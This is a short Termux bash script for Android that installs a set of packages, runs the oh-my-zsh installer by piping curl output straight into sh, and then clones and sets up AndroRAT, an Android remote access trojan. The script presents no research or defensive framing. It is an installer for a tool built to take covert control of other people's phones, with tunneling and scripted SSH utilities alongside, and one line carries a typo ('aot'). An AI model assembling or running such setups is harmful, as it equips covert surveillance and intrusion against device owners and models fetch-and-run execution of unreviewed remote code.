#!/usr/bin/bash
termux-setup-storage
apt update
apt upgrade -y
apt dist-upgrade -y
apt install root-repo -y
apt install x11-repo -y
apt install termux-api -y
apt install git -y
apt install wget -y
aot install curl -y
apt install python -y
apt install php -y
apt install ruby -y
apt install mc -y
apt install zsh -y
apt install toilet -y
apt install figlet -y
apt install cloudflared -y
apt install openssh -y
apt install sshpass -y
gem install lolcat
python3 -m pip install --upgrade pip
sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt
